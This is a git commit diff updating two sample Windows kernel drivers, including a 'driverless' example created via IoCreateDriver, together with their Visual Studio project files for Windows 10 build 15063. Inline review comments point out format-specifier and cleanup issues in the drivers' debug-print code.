Update for Windows 10rs2 (15063)
hfiref0x 2017-04-20 16:52:12 +07:00
parent 7e4aec975f
commit 9db2618d9e
16 changed files with 379 additions and 492 deletions

Binary file not shown.

Binary file not shown.

Binary file not shown.


@ -1,7 +1,7 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 14
VisualStudioVersion = 14.0.24720.0
VisualStudioVersion = 14.0.25420.1
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "dummy", "dummy\dummy.vcxproj", "{3D8146DE-8064-46C0-9E70-CEEC357B2290}"
EndProject


@ -1,14 +1,6 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
@ -17,22 +9,6 @@
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|ARM">
<Configuration>Debug</Configuration>
<Platform>ARM</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|ARM">
<Configuration>Release</Configuration>
<Platform>ARM</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|ARM64">
<Configuration>Debug</Configuration>
<Platform>ARM64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|ARM64">
<Configuration>Release</Configuration>
<Platform>ARM64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{3D8146DE-8064-46C0-9E70-CEEC357B2290}</ProjectGuid>
@ -45,22 +21,6 @@
<WindowsTargetPlatformVersion>8.1</WindowsTargetPlatformVersion>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>true</UseDebugLibraries>
@ -78,38 +38,6 @@
<DriverTargetPlatform>Universal</DriverTargetPlatform>
<WholeProgramOptimization>true</WholeProgramOptimization>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM64'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM64'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
@ -118,18 +46,6 @@
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
@ -143,30 +59,6 @@
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM64'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM64'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<SuppressStartupBanner>false</SuppressStartupBanner>
@ -192,36 +84,6 @@
<Profile>false</Profile>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM64'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM64'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>


@ -1,12 +1,12 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2016
* (C) COPYRIGHT AUTHORS, 2016 - 2017
*
* TITLE: MAIN.C
*
* VERSION: 1.00
* VERSION: 1.01
*
* DATE: 29 Jan 2016
* DATE: 20 Apr 2017
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
@ -33,31 +33,53 @@ NTSTATUS DriverEntry(
_In_ PUNICODE_STRING RegistryPath
)
{
LARGE_INTEGER tm;
PEPROCESS Process;
tm.QuadPart = -10000000;
KIRQL Irql;
PWSTR sIrql;
/* This parameters are invalid due to nonstandard way of loading and should not be used. */
UNREFERENCED_PARAMETER(DriverObject);
UNREFERENCED_PARAMETER(RegistryPath);
DbgPrint("Hello from kernel mode, system range start is %p, code mapped at %p", MmSystemRangeStart, DriverEntry);
DbgPrint("Hello from kernel mode, system range start is %p, code mapped at %p\n", MmSystemRangeStart, DriverEntry);
Process = PsGetCurrentProcess();
do {
KeDelayExecutionThread(KernelMode, FALSE, &tm);
DbgPrint("I'm at %s, Process : %lu (%p)",
DbgPrint("I'm at %s, Process : %lu (%p)\n",
__FUNCTION__,
(ULONG)PsGetCurrentProcessId(),
Process
);
Process);
Irql = KeGetCurrentIrql();
} while (1);
switch (Irql) {
case PASSIVE_LEVEL:
sIrql = L"PASSIVE_LEVEL";
break;
case APC_LEVEL:
sIrql = L"APC_LEVEL";
break;
case DISPATCH_LEVEL:
sIrql = L"DISPATCH_LEVEL";
break;
case CMCI_LEVEL:
sIrql = L"CMCI_LEVEL";
break;
case CLOCK_LEVEL:
sIrql = L"CLOCK_LEVEL";
break;
case IPI_LEVEL:
sIrql = L"IPI_LEVEL";
break;
case HIGH_LEVEL:
sIrql = L"HIGH_LEVEL";
break;
default:
sIrql = L"Unknown Value";
break;
}
DbgPrint("KeGetCurrentIrql=%ws\n", sIrql);
return STATUS_SUCCESS;
}
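Review bot: The new `DbgPrint("KeGetCurrentIrql=%ws\n", sIrql);` at the end of DriverEntry uses a wide-string specifier, and Microsoft documents the Unicode format codes (`%ws`, `%wZ`, `%S`, `%C`) as usable only at IRQL = PASSIVE_LEVEL, while the switch above it exists to report higher levels as well. Keeping the level names as narrow strings avoids the restriction: `PCSTR sIrql;`, `sIrql = "PASSIVE_LEVEL";` and `DbgPrint("KeGetCurrentIrql=%s\n", sIrql);`. The same applies to `PrintIrql` in the second MAIN.C section of this commit. Separately, `(ULONG)PsGetCurrentProcessId()` truncates a HANDLE on x64, and `(ULONG)(ULONG_PTR)PsGetCurrentProcessId()` would make that explicit. DriverEntry's signature begins outside the hunk.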


@ -1,7 +1,7 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 14
VisualStudioVersion = 14.0.24720.0
VisualStudioVersion = 14.0.25420.1
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "dummy", "dummy\dummy.vcxproj", "{3D8146DE-8064-46C0-9E70-CEEC357B2290}"
EndProject


@ -1,14 +1,6 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
@ -17,22 +9,6 @@
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|ARM">
<Configuration>Debug</Configuration>
<Platform>ARM</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|ARM">
<Configuration>Release</Configuration>
<Platform>ARM</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|ARM64">
<Configuration>Debug</Configuration>
<Platform>ARM64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|ARM64">
<Configuration>Release</Configuration>
<Platform>ARM64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{3D8146DE-8064-46C0-9E70-CEEC357B2290}</ProjectGuid>
@ -45,22 +21,6 @@
<WindowsTargetPlatformVersion>8.1</WindowsTargetPlatformVersion>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>true</UseDebugLibraries>
@ -78,38 +38,6 @@
<DriverTargetPlatform>Universal</DriverTargetPlatform>
<WholeProgramOptimization>true</WholeProgramOptimization>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM64'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM64'" Label="Configuration">
<TargetVersion>Windowsv6.3</TargetVersion>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
<ConfigurationType>Driver</ConfigurationType>
<DriverType>KMDF</DriverType>
<DriverTargetPlatform>Universal</DriverTargetPlatform>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
@ -118,18 +46,6 @@
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
@ -143,30 +59,6 @@
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM64'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM64'">
<DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<SuppressStartupBanner>false</SuppressStartupBanner>
@ -192,36 +84,6 @@
<Profile>false</Profile>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM64'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM64'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<TreatWarningAsError>false</TreatWarningAsError>


@ -1,12 +1,14 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2016
* (C) COPYRIGHT AUTHORS, 2016 - 2017
*
* TITLE: MAIN.C
*
* VERSION: 1.00
* VERSION: 1.01
*
* DATE: 29 Jan 2016
* DATE: 20 Apr 2017
*
* "Driverless" example #2
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
@ -19,6 +21,51 @@
#define DEBUGPRINT
/*
* PrintIrql
*
* Purpose:
*
* Debug print current irql.
*
*/
VOID PrintIrql()
{
KIRQL Irql;
PWSTR sIrql;
Irql = KeGetCurrentIrql();
switch (Irql) {
case PASSIVE_LEVEL:
sIrql = L"PASSIVE_LEVEL";
break;
case APC_LEVEL:
sIrql = L"APC_LEVEL";
break;
case DISPATCH_LEVEL:
sIrql = L"DISPATCH_LEVEL";
break;
case CMCI_LEVEL:
sIrql = L"CMCI_LEVEL";
break;
case CLOCK_LEVEL:
sIrql = L"CLOCK_LEVEL";
break;
case IPI_LEVEL:
sIrql = L"IPI_LEVEL";
break;
case HIGH_LEVEL:
sIrql = L"HIGH_LEVEL";
break;
default:
sIrql = L"Unknown Value";
break;
}
DbgPrint("KeGetCurrentIrql=%u(%ws)\n", Irql, sIrql);
}
/*
* DevioctlDispatch
*
@ -168,26 +215,6 @@ NTSTATUS CloseDispatch(
return Irp->IoStatus.Status;
}
VOID ListModules(
_In_ struct _DRIVER_OBJECT *DriverObject
)
{
PLIST_ENTRY entry0, entry1;
KLDR_DATA_TABLE_ENTRY *section = (KLDR_DATA_TABLE_ENTRY*)DriverObject->DriverSection;
if (section == NULL)
return;
entry0 = section->InLoadOrderLinks.Flink;
entry1 = entry0;
do {
section = (KLDR_DATA_TABLE_ENTRY*)CONTAINING_RECORD(entry1, KLDR_DATA_TABLE_ENTRY, InLoadOrderLinks);
DbgPrint("Section=%p, %wZ", section, section->BaseDllName);
entry1 = entry1->Flink;
} while (entry1 != entry0);
}
/*
* DriverInitialize
*
@ -202,37 +229,33 @@ NTSTATUS DriverInitialize(
)
{
NTSTATUS status;
UNICODE_STRING SymLink, DevName/*, DrvRefName*/;
UNICODE_STRING SymLink, DevName;
PDEVICE_OBJECT devobj;
ULONG t;
WCHAR szDevName[] = { L'\\', L'D', L'e', L'v', L'i', L'c', L'e', L'\\', L'T', L'D', L'L', L'D', 0 };
WCHAR szSymLink[] = { L'\\', L'D', L'o', L's', L'D', L'e', L'v', L'i', L'c', L'e', L's', L'\\', L'T', L'D', L'L', L'D', 0 };
// WCHAR szNullDrv[] = { L'\\', L'D', L'r', L'i', L'v', L'e', L'r', L'\\', L'N', L'u', L'l', L'l', 0 };
// PDRIVER_OBJECT driverObject;
//RegistryPath is NULL
UNREFERENCED_PARAMETER(RegistryPath);
#ifdef DEBUGPRINT
DbgPrint("%s", __FUNCTION__);
DbgPrint("%s\n", __FUNCTION__);
#endif
RtlInitUnicodeString(&DevName, szDevName);
RtlInitUnicodeString(&DevName, L"\\Device\\TDLD");
status = IoCreateDevice(DriverObject, 0, &DevName, FILE_DEVICE_UNKNOWN, FILE_DEVICE_SECURE_OPEN, TRUE, &devobj);
#ifdef DEBUGPRINT
DbgPrint("%s IoCreateDevice(%wZ) = %lx", __FUNCTION__, DevName, status);
DbgPrint("%s IoCreateDevice(%wZ) = %lx\n", __FUNCTION__, DevName, status);
#endif
if (!NT_SUCCESS(status)) {
return status;
}
RtlInitUnicodeString(&SymLink, szSymLink);
RtlInitUnicodeString(&SymLink, L"\\DosDevices\\TDLD");
status = IoCreateSymbolicLink(&SymLink, &DevName);
#ifdef DEBUGPRINT
DbgPrint("%s IoCreateSymbolicLink(%wZ) = %lx", __FUNCTION__, SymLink, status);
DbgPrint("%s IoCreateSymbolicLink(%wZ) = %lx\n", __FUNCTION__, SymLink, status);
#endif
devobj->Flags |= DO_BUFFERED_IO;
@ -246,17 +269,6 @@ NTSTATUS DriverInitialize(
DriverObject->DriverUnload = NULL; //nonstandard way of driver loading, no unload
devobj->Flags &= ~DO_DEVICE_INITIALIZING;
/*
RtlInitUnicodeString(&DrvRefName, szNullDrv);
if (NT_SUCCESS(ObReferenceObjectByName(&DrvRefName, OBJ_CASE_INSENSITIVE, NULL, 0,
*IoDriverObjectType, KernelMode, NULL, &driverObject)))
{
DbgPrint("drvObj %p", driverObject);
ListModules(driverObject);
ObDereferenceObject(driverObject);
}
*/
return status;
}
@ -275,21 +287,22 @@ NTSTATUS DriverEntry(
{
NTSTATUS status;
UNICODE_STRING drvName;
WCHAR szDrvName[] = { L'\\', L'D', L'r', L'i', L'v', L'e', L'r', L'\\', L'T', L'D', L'L', L'D', 0 };
/* This parameters are invalid due to nonstandard way of loading and should not be used. */
UNREFERENCED_PARAMETER(DriverObject);
UNREFERENCED_PARAMETER(RegistryPath);
PrintIrql();
#ifdef DEBUGPRINT
DbgPrint("%s", __FUNCTION__);
DbgPrint("%s\n", __FUNCTION__);
#endif
RtlInitUnicodeString(&drvName, szDrvName);
RtlInitUnicodeString(&drvName, L"\\Driver\\TDLD");
status = IoCreateDriver(&drvName, &DriverInitialize);
#ifdef DEBUGPRINT
DbgPrint("%s IoCreateDriver(%wZ) = %lx", __FUNCTION__, drvName, status);
DbgPrint("%s IoCreateDriver(%wZ) = %lx\n", __FUNCTION__, drvName, status);
#endif
return status;
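Review bot: The `%wZ` specifier expects a pointer to a UNICODE_STRING, but the DbgPrint calls in DriverInitialize and DriverEntry pass `DevName`, `SymLink` and `drvName` by value; this presumably only works because the x64 calling convention passes a 16-byte structure by reference. Pass the address instead, for example `DbgPrint("%s IoCreateDevice(%wZ) = %lx\n", __FUNCTION__, &DevName, status);`, and likewise `&SymLink` and `&drvName`. In the visible lines the result of IoCreateSymbolicLink is only logged before `devobj->Flags` is modified; if the part of DriverInitialize outside the hunk does not handle that failure, the device object should be released with IoDeleteDevice and the status returned. Both functions extend beyond the hunks shown.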


@ -1,12 +1,12 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2016
* (C) COPYRIGHT AUTHORS, 2016 - 2017
*
* TITLE: MAIN.H
*
* VERSION: 1.00
* VERSION: 1.01
*
* DATE: 29 Jan 2016
* DATE: 20 Apr 2017
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
@ -24,21 +24,6 @@ IoCreateDriver(
IN PDRIVER_INITIALIZE InitializationFunction
);
NTKERNELAPI
NTSTATUS
ObReferenceObjectByName(
__in PUNICODE_STRING ObjectName,
__in ULONG Attributes,
__in_opt PACCESS_STATE AccessState,
__in_opt ACCESS_MASK DesiredAccess,
__in POBJECT_TYPE ObjectType,
__in KPROCESSOR_MODE AccessMode,
__inout_opt PVOID ParseContext,
__out PVOID *Object
);
extern POBJECT_TYPE *IoDriverObjectType;
_Dispatch_type_(IRP_MJ_DEVICE_CONTROL)
DRIVER_DISPATCH DevioctlDispatch;
_Dispatch_type_(IRP_MJ_CREATE)
@ -88,25 +73,3 @@ typedef struct _INOUT_PARAM {
ULONG Param3;
ULONG Param4;
} INOUT_PARAM, *PINOUTPARAM;
typedef struct _KLDR_DATA_TABLE_ENTRY {
LIST_ENTRY InLoadOrderLinks;
PVOID ExceptionTable;
ULONG ExceptionTableSize;
// ULONG padding on IA64
PVOID GpValue;
PVOID NonPagedDebugInfo;
PVOID DllBase;
PVOID EntryPoint;
ULONG SizeOfImage;
UNICODE_STRING FullDllName;
UNICODE_STRING BaseDllName;
ULONG Flags;
USHORT LoadCount;
USHORT __Unused5;
PVOID SectionPointer;
ULONG CheckSum;
// ULONG padding on IA64
PVOID LoadedImports;
PVOID PatchInformation;
} KLDR_DATA_TABLE_ENTRY, *PKLDR_DATA_TABLE_ENTRY;


@ -53,7 +53,7 @@
<LinkIncremental>false</LinkIncremental>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
<CodeAnalysisRuleSet>NativeRecommendedRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<RunCodeAnalysis>false</RunCodeAnalysis>
</PropertyGroup>
